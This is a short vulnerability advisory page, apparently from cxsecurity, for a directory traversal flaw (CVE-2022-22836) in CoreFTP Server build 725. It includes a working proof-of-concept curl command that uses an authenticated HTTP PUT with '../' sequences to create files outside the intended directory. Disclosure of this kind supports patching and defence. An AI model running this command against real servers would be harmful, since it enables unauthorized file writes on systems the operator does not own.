CoreFTP Server Build 725 Directory Traversal

2022.01.10
Credit: LiamInfosec
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22

# Exploit Title: CoreFTP Server build 725 - Directory Traversal (Authenticated) # Date: 08/01/2022 # Exploit Author: LiamInfosec # Vendor Homepage: http://coreftp.com/ # Version: build 725 and below # Tested on: Windows 10 # CVE : CVE-2022-22836 # Description: CoreFTP Server before 727 allows directory traversal (for file creation) by an authenticated attacker via ../ in an HTTP PUT request. # Proof of Concept: curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top